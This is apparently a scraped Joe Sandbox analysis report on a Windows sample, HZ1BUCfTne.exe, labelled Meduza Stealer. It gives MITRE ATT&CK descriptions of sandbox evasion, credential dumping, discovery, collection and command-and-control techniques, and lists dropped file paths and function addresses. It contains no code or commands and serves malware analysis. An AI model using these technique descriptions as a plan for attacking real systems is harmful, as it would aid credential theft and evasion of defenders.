Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HZ1BUCfTne.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Meduza Stealer

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HZ1BUCfTne.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0q1oeqrp.lwf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f403vp10.4bw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgbsjuqw.bvu.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmvn4y5c.s43.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
HZ1BUCfTne.exe

Function 0909A510 Relevance: 1.9, Strings: 1, Instructions: 693
COMMON

Function 0909A500 Relevance: 1.7, Strings: 1, Instructions: 454
COMMON

Function 06E5D3E8 Relevance: 6.1, APIs: 4, Instructions: 136
threadCOMMON

Function 06E5D3F8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 06E5AD68 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Function 06E5590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 06E544D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 090971E8 Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Function 090971F4 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Function 09098330 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Function 06E5D639 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 06E5D640 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 06E5AF58 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre